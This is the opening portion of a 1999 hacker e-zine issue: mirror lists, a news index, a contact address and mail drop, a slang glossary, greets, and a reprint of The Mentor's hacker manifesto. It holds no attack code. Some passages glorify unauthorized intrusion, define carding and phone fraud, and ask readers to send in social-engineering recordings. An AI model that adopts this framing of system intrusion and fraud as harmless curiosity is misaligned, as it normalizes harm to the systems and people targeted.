[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA'99=] Number 31 Volume 1 1999 Aug 29th 99 ========================================================================== [ 61:20:6B:69:64:20:63:6F:75: ] [ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ] [ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ] ========================================================================== Well http://welcome.to/HWA.hax0r.news/ is still down and out of reach, I have an email in to the admins of the V3 redirector site to see if I can't get access back to my redirector but i'm not hopeful. Meanwhile you can get us at www.csoft.net/~hwa =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= This week features an article by Dragos Ruiu entitleed "Stealth Coordinated Attack HOWTO" and is a very well written piece that sysadmins and hackers alike will find very informative, its a must-read (section #42) - Ed =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= New mirror sites http://www.attrition.org/hosted/hwa/ http://www.ducktank.net/hwa/issues.html. http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ http://hwazine.cjb.net/ http://www.hackunlimited.com/files/secu/papers/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ * http://hwa.hax0r.news.8m.com/ * http://www.fortunecity.com/skyscraper/feature/103/ * Crappy free sites but they offer 20M & I need the space... HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net and www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth and airportman for the Cubesoft bandwidth. Also shouts out to all our mirror sites! tnx guys. http://www.csoft.net/~hwa http://www.digitalgeeks.com/hwa HWA.hax0r.news Mirror Sites: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.attrition.org/hosted/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.ducktank.net/hwa/issues.html. ** NEW ** http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT ** http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa. http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://archives.projectgamma.com/zines/hwa/. http://www.403-security.org/Htmls/hwa.hax0r.news.htm =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= SYNOPSIS (READ THIS) -------------------- The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. (remember i'm doing this for me, not you, the fact some people happen to get a kick/use out of it is of secondary importance). This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to compliment such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle... @HWA =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... #31 =-----------------------------------------------------------------------= We could use some more people joining the channel, its usually pretty quiet, we don't bite (usually) so if you're hanging out on irc stop by and idle a while and say hi... ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** *** *** *** please join to discuss or impart news on techno/phac scene *** *** stuff or just to hang out ... someone is usually around 24/7*** *** *** *** Note that the channel isn't there to entertain you its for *** *** you to talk to us and impart news, if you're looking for fun*** *** then do NOT join our channel try #weirdwigs or something... *** *** we're not #chatzone or #hack *** *** *** ******************************************************************* =-------------------------------------------------------------------------= Issue #31 =--------------------------------------------------------------------------= [ INDEX ] =--------------------------------------------------------------------------= Key Intros =--------------------------------------------------------------------------= 00.0 .. COPYRIGHTS ...................................................... 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC ....................... 00.2 .. SOURCES ......................................................... 00.3 .. THIS IS WHO WE ARE .............................................. 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?.......................... 00.5 .. THE HWA_FAQ V1.0 ................................................ =--------------------------------------------------------------------------= Key Content =--------------------------------------------------------------------------= 01.0 .. GREETS .......................................................... 01.1 .. Last minute stuff, rumours, newsbytes ........................... 01.2 .. Mailbag ......................................................... 02.0 .. From the Editor.................................................. 03.0 .. DOJ contemplates secret searches................................. 04.0 .. First net convict will do no time................................ 05.0 .. NORTON ANTIVIRUS 2000 IS OUT..................................... 06.0 .. SSL CPU CONSUMPTION CAUSES CONCERNS.............................. 07.0 .. Bug in Bill Gate's Anus?......................................... 08.0 .. CESA Causing Outrage In Libertarians ............................ 09.0 .. ReDaTtAcK Arrested, Questioned, Charged, Released................ 10.0 .. Some GPS Systems Fail With Date Rollover ........................ 11.0 .. Security Search Engine MindSec Goes Online ...................... 12.0 .. CIA Ex-Director Security Clearance Revoked ...................... 13.0 .. GAO Releases Report on Risk Assement ............................ 14.0 .. CESA Drives People to Freedom ................................... 15.0 .. Who's doing the Scanning? ....................................... 16.0 .. Japanese police go after copyright infringers.................... 17.0 .. Anti-Gay Web domain Returned to Original Owner .................. 18.0 .. EXPLOIT-DEV Mailing List Started ................................ 19.0 .. NetBus - Product Under Siege .................................... 20.0 .. Worst Security Hole Ever? ....................................... 21.0 .. IRC Banned in Malaysia .......................................... 22.0 .. I want my, I want my, I want my HNN - more goodies from HNN...... 23.0 .. Melissa Creator Admits Guilt .................................... 24.0 .. cDc Responds to Allegations About HKBs .......................... 25.0 .. $50G Offered in 'Hacker Challenge' Publicity Stunt .............. 26.0 .. NSA Recruiting In the Underground ............................... 27.0 .. Distributed.net Fingers Thief ................................... 28.0 .. Hacktivism Email List ........................................... 29.0 .. Mitnick in Car Accident ......................................... 30.0 .. Hong Kong Police Create Computer Crime Squad .................... 31.0 .. Outlook Holes Demonstrated at USENIX ............................ 32.0 .. Feds Overflowing with Siezed Equipment .......................... 33.0 .. Computer Hacker’s Sentence Spotlights High-Tech Crime Prosecutions 34.0 .. Triads Linked to Info Vandalism - Alleged CoverUp by RCMP ....... 35.0 .. DoD Preps to Fight InfoCriminals Both Foreign and Domestic ...... 36.0 .. Another Big Hole Found in NT .................................... 37.0 .. Korea to Block All Porn ......................................... 38.0 .. Grammatically Challenged InfoCriminal Defaces Site .............. 39.0 .. Bank Emails Virus to Investors .................................. 40.0 .. IS YAHOO SPAM OR ANTI-SPAM ORIENTED?............................. 41.0 .. "NINES PROBLEM".................................................. 42.0 .. Stealth Coordinated Attack HOWTO by Dragos Ruiu.................. 43.0 .. TAIWAN CIRCLES WAGONS IN CYBER-WARFARE........................... 44.0 .. UK WEBHOSTING COMPANY HIT BY VIRUS............................... 45.0 .. NETSCAPE ISSUES WEB-SERVER FIX................................... 46.0 .. CWI CRACKS 512 BIT KEY........................................... 47.0 .. MOUNTING AN ANTI-VIRUS DEFENSE................................... 48.0 .. RETROSPECTIVE ON CRACKING CONTESTS............................... 49.0 .. SHOUTCAST COMPROMISED............................................ 50.0 .. AUDIT OFFICE BLASTS AGENCIES' SERIOUS SECURITY FLAWS............. 51.0 .. ISS X-FORCE ADVISORY ON LOTUS NOTES DOMINO SERVER 4.6............ 52.0 .. TECHNOLOGY KEY TO TRACKING DOWN INTERNET CRIME................... 53.0 .. GOVT HOME-INVASION BILL DRIVES US PC USERS TO CANADA............. 54.0 .. HACKERS SCANNING FOR TROUBLE..................................... 55.0 .. Canada Net they've built a super fast network, but what to do with it? 56.0 .. Security focus BUGTRAQ summary................................... 57.0 .. A typical script kiddie attack scenerio against HTTP server...... 58.0 .. NMAP - Scan Analysis (v2)........................................ 59.0 .. Security Focus: Incidents Summary................................ 60.0 .. Security Focus: Jobs............................................. =--------------------------------------------------------------------------= AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in. ads for other zines are ok too btw just mention us in yours, please remember to include links and an email contact. Corporate ads will be considered also and if your company wishes to donate to or participate in the upcoming Canc0n99 event send in your suggestions and ads now...n.b date and time may be pushed back join mailing list for up to date information....................................... Current dates: POSTPONED til further notice, place: TBA.. ................. Ha.Ha .. Humour and puzzles ............................................ Hey You!........................................................ =------=........................................................ Send in humour for this section! I need a laugh and its hard to find good stuff... ;)........................................... SITE.1 .. Featured site, ................................................. H.W .. Hacked Websites ............................................... A.0 .. APPENDICES...................................................... A.1 .. PHACVW linx and references...................................... =--------------------------------------------------------------------------= @HWA'99 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ). Important semi-legalese and license to redistribute: YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it. cruciphux@dok.org Cruciphux [C*:.] 00.1 CONTACT INFORMATION AND MAIL DROP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are ~~~~~~~ reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx. Ideas for interesting 'stuff' to send in apart from news: - Photo copies of old system manual front pages (optionally signed by you) ;-) - Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n. - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. Stuff you can email: - Prank phone calls in .ram or .mp* format - Fone tones and security announcements from PBX's etc - fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities) - reserved for one smiley face -> :-) <- - PHACV lists of files that you have or phac cd's you own (we have a burner, *g*) - burns of phac cds (email first to make sure we don't already have em) - Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp* If you still can't think of anything you're probably not that interesting a person after all so don't worry about it Our current email: Submissions/zine gossip.....: hwa@press.usmc.net Private email to editor.....: cruciphux@dok.org Distribution/Website........: sas72@usa.net @HWA 00.2 Sources *** ~~~~~~~~~~~ Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed. News & I/O zine ................. http://www.antionline.com/ Back Orifice/cDc..................http://www.cultdeadcow.com/ News site (HNN) .....,............http://www.hackernews.com/ Help Net Security.................http://net-security.org/ News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/ NewsTrolls .(daily news ).........http://www.newstrolls.com/ News + Exploit archive ...........http://www.rootshell.com/beta/news.html CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest News site+........................http://www.zdnet.com/ News site+Security................http://www.gammaforce.org/ News site+Security................http://www.projectgamma.com/ News site+Security................http://securityhole.8m.com/ News site+Security related site...http://www.403-security.org/ *DOWN* News/Humour site+ ................http://www.innerpulse.com News/Techie news site.............http://www.slashdot.org +Various mailing lists and some newsgroups, such as ... +other sites available on the HNN affiliates page, please see http://www.hackernews.com/affiliates.html as they seem to be popping up rather frequently ... http://www.the-project.org/ .. IRC list/admin archives http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk alt.hackers.malicious alt.hackers alt.2600 BUGTRAQ ISN security mailing list ntbugtraq <+others> NEWS Agencies, News search engines etc: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.cnn.com/SEARCH/ http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0 http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack http://www.ottawacitizen.com/business/ http://search.yahoo.com.sg/search/news_sg?p=hack http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack http://www.zdnet.com/zdtv/cybercrime/ http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column) NOTE: See appendices for details on other links. http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm http://freespeech.org/eua/ Electronic Underground Affiliation http://ech0.cjb.net ech0 Security http://axon.jccc.net/hir/ Hackers Information Report http://net-security.org Net Security http://www.403-security.org Daily news and security related site Submissions/Hints/Tips/Etc ~~~~~~~~~~~~~~~~~~~~~~~~~~ All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care wether the article/email is to be used in an issue or not and may be used at my discretion. Looking for: Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box. - Ed Mailing List Subscription Info (Far from complete) Feb 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ ISS Security mailing list faq : http://www.iss.net/iss/maillist.html THE MOST READ: BUGTRAQ - Subscription info ~~~~~~~~~~~~~~~~~~~~~~~~~~~ What is Bugtraq? Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin . To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail. Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html Link About the Bugtraq mailing list ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following comes from Bugtraq's info file: This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks. Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list`s charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list. Please follow the below guidelines on what kind of information should be posted to the Bugtraq list: + Information on Unix related security holes/backdoors (past and present) + Exploit programs, scripts or detailed processes about the above + Patches, workarounds, fixes + Announcements, advisories or warnings + Ideas, future plans or current works dealing with Unix security + Information material regarding vendor contacts and procedures + Individual experiences in dealing with above vendors or security organizations + Incident advisories or informational reporting Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria. Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin) Crypto-Gram ~~~~~~~~~~~ CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com.  To unsubscribe, visit http://www.counterpane.com/unsubform.html.  Back issues are available on http://www.counterpane.com. CRYPTO-GRAM is written by Bruce Schneier.  Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms.  He served on the board of the International Association for Cryptologic Research, EPIC, and VTW.  He is a frequent writer and lecturer on cryptography. CUD Computer Underground Digest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This info directly from their latest ish: Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09                             ISSN  1004-042X        Editor: Jim Thomas (cudigest@sun.soci.niu.edu)        News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)        Archivist: Brendan Kehoe        Poof Reader:   Etaion Shrdlu, Jr.        Shadow-Archivists: Dan Carosone / Paul Southworth                           Ralph Sims / Jyrki Kuoppala                           Ian Dickinson        Cu Digest Homepage: http://www.soci.niu.edu/~cudigest [ISN] Security list ~~~~~~~~~~~~~~~~~~~ This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed Subscribe: mail majordomo@repsec.com with "subscribe isn". @HWA 00.3 THIS IS WHO WE ARE ~~~~~~~~~~~~~~~~~~ Some HWA members and Legacy staff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cruciphux@dok.org.........: currently active/editorial darkshadez@ThePentagon.com: currently active/man in black fprophet@dok.org..........: currently active/IRC+ man in black sas72@usa.net ............. currently active/IRC+ distribution vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black dicentra...(email withheld): IRC+ grrl in black eentity ...( '' '' ): Currently active/IRC+ man in black Foreign Correspondants/affiliate members ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Qubik ............................: United Kingdom D----Y ...........................: USA/world media HWA members ......................: World Media Past Foreign Correspondants (currently inactive or presumed dead) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ N0Portz ..........................: Australia system error .....................: Indonesia Wile (wile coyote) ...............: Japan/the East Ruffneck ........................: Netherlands/Holland Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed Spikeman's site is down as of this writing, if it comes back online it will be posted here. http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian) ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** ******************************************************************* :-p 1. We do NOT work for the government in any shape or form.Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/ 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 00.4 Whats in a name? why HWA.hax0r.news?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pidgeon holed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. Its almost like buying a clue. Anyway..on with the show .. - Editorial staff @HWA 00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers: Some of the stuff related to personal useage and use in this zine are listed below: Some are very useful, others attempt to deny the any possible attempts at eschewing obfuscation by obsucuring their actual definitions. @HWA - see EoA ;-) != - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..) AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21) AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one?? *CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's CCC - Chaos Computer Club (Germany) *CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk. *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer 2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed Ebonics - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer EoC - End of Commentary EoA - End of Article or more commonly @HWA EoF - End of file EoD - End of diatribe (AOL'ers: look it up) FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;) du0d - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used. *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or can you hax0r some bread on the way to the table please?' 2 - A tool for cutting sheet metal. HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;& HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d MFI/MOI- Missing on/from IRC NFC - Depends on context: No Further Comment or No Fucking Comment NFR - Network Flight Recorder (Do a websearch) see 0wn3d NFW - No fuckin'way *0WN3D - You are cracked and owned by an elite entity see pheer *OFCS - Oh for christ's sakes PHACV - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates: H - hacking, hacktivist C - Cracking C - Cracking V - Virus W - Warfare A - Anarchy (explosives etc, Jolly Roger's Cookbook etc) P - Phreaking, "telephone hacking" PHone fREAKs ... CT - Cyber Terrorism *PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d *RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass. TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0 TBA - To Be Arranged/To Be Announced also 2ba TFS - Tough fucking shit. *w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten" 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers) *wtf - what the fuck, where the fuck, when the fuck etc .. *ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked. @HWA -=- :. .: -=- 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. * all the people who sent in cool emails and support FProphet Pyra TwstdPair _NeM_ D----Y Dicentra vexxation sAs72 Spikeman p0lix Ken Williams/tattooman of PacketStorm, hang in there Ken...:( & Kevin Mitnick (Happy Birthday) kewl sites: + http://www.securityportal.com/ NEW + http://www.securityfocus.com/ NEW + http://www.hackcanada.com/ + http://www.l0pht.com/ + http://www.2600.com/ + http://www.freekevin.com/ + http://www.genocide2600.com/ + http://www.packetstorm.harvard.edu/ ******* DOWN (THANKS JP) ****** + http://www.hackernews.com/ (Went online same time we started issue 1!) + http://www.net-security.org/ + http://www.slashdot.org/ + http://www.freshmeat.net/ + http://www.403-security.org/ + http://ech0.cjb.net/ @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 +++ When was the last time you backed up your important data? ++ DEFAULT #3 RELEASED The cool DEFAULT newsletter by Help net-security.org is up to issue#3 check it out by BHZ, Friday 27th August 1999 on 3:01 pm CET Third issue of our newsletter is out. You can read abot following topics: Y2K week in review + Outlook Express Year 2000 Update, Look into basic cryptography, Freedom Network, IP Masquerading, Macintosh security, Trojan forensics, Scams - Getting something by all means, Freedom of the speech review and part two of excellent Intrusion and detection article. Download > default3.txt or default3.zip. http://default.net-security.org/dl/default3.txt http://default.net-security.org/dl/default3.zip Thanks to myself for providing the info from my wired news feed and others from whatever sources, also to Spikeman for sending in past entries.... - Ed @HWA 01.2 MAILBAG - email and posts from the message board worthy of a read ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ (No mail worthy of posting here this issue,) Yeah we have a message board, feel free to use it, remember there are no stupid questions... well there are but if you ask something really dumb we'll just laugh at ya, lets give the message board a bit more use eh? i'll be using a real message board when the hwa-iwa.org domain comes back online (soon) meanwhile the beseen board is still up... Since theres nothing to print here, here's the Mentor's last words direct from Phrack7 file 003 complete and unabridged... send in your mail/questions etc! - Ed ==Phrack Inc.== Volume One, Issue 7, Phile #3 of 10 The following was written shortly after my arrest. I am currently groupless, having resigned from the Racketeers, so ignore the signoff... The Conscience of a Hacker... by The Mentor... 1/8/86 Another one got caught today, it's all over the papers. "Teenager Arrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"... Damn kids. They're all alike. But did you, in your three-piece psychology and 1950's technobrain, ever take a look behind the eyes of the hacker? Did you ever wonder what made him tick, what forces shaped him, what may have molded him? I am a hacker, enter my world... Mine is a world that begins with school... I'm smarter than most of the other kids, this crap they teach us bores me... Damn underachiever. They're all alike. I'm in junior high or high school. I've listened to teachers explain for the fifteenth time how to reduce a fraction. I understand it. "No, Ms. Smith, I didn't show my work. I did it in my head..." Damn kid. Probably copied it. They're all alike. I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not because it doesn't like me... Or feels threatened by me... Or thinks I'm a smart ass... Or doesn't like teaching and shouldn't be here... Damn kid. All he does is play games. They're all alike. And then it happened... a door opened to a world... rushing through the phone line like heroin through an addict's veins, an electronic pulse is sent out, a refuge from the day-to-day incompetencies is sought... a board is found. "This is it... this is where I belong..." I know everyone here... even if I've never met them, never talked to them, may never hear from them again... I know you all... Damn kid. Tying up the phone line again. They're all alike... You bet your ass we're all alike... we've been spoon-fed baby food at school when we hungered for steak... the bits of meat that you did let slip through were pre-chewed and tasteless. We've been dominated by sadists, or ignored by the apathetic. The few that had something to teach found us will- ing pupils, but those few are like drops of water in the desert. This is our world now... the world of the electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt-cheap if it wasn't run by profiteering gluttons, and you call us criminals. We explore... and you call us criminals. We seek after knowledge... and you call us criminals. We exist without skin color, without nationality, without religious bias... and you call us criminals. You build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it's for our own good, yet we're the criminals. Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for. I am a hacker, and this is my manifesto. You may stop this indiv- idual, but you can't stop us all... after all, we're all alike. +++The Mentor+++ Racketeers ============================================================================== 02.0 From the editor. ~~~~~~~~~~~~~~~~ #include #include #include main() { printf ("Read commented source!\n\n"); /* This issue includes an article by Dragos Ruiu that is well worth the read * it is entitled "Stealth Coordinated Attack HOWTO" as mentioned in the header * and outlines various attack methods employed by todays hacker used to scope * out and penetrate your systems. The article can be found in section 42.0 * * As always we welcome your stories, articles and poetry, please send them with any * information about yourself you see fit or would like included to the address below... * * Please, send your submissions to: hwa@press.usmc.net thank you. * * Cruciphux */ printf ("EoF.\n"); } Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mai*lbombs can go to /dev/nul nukes, 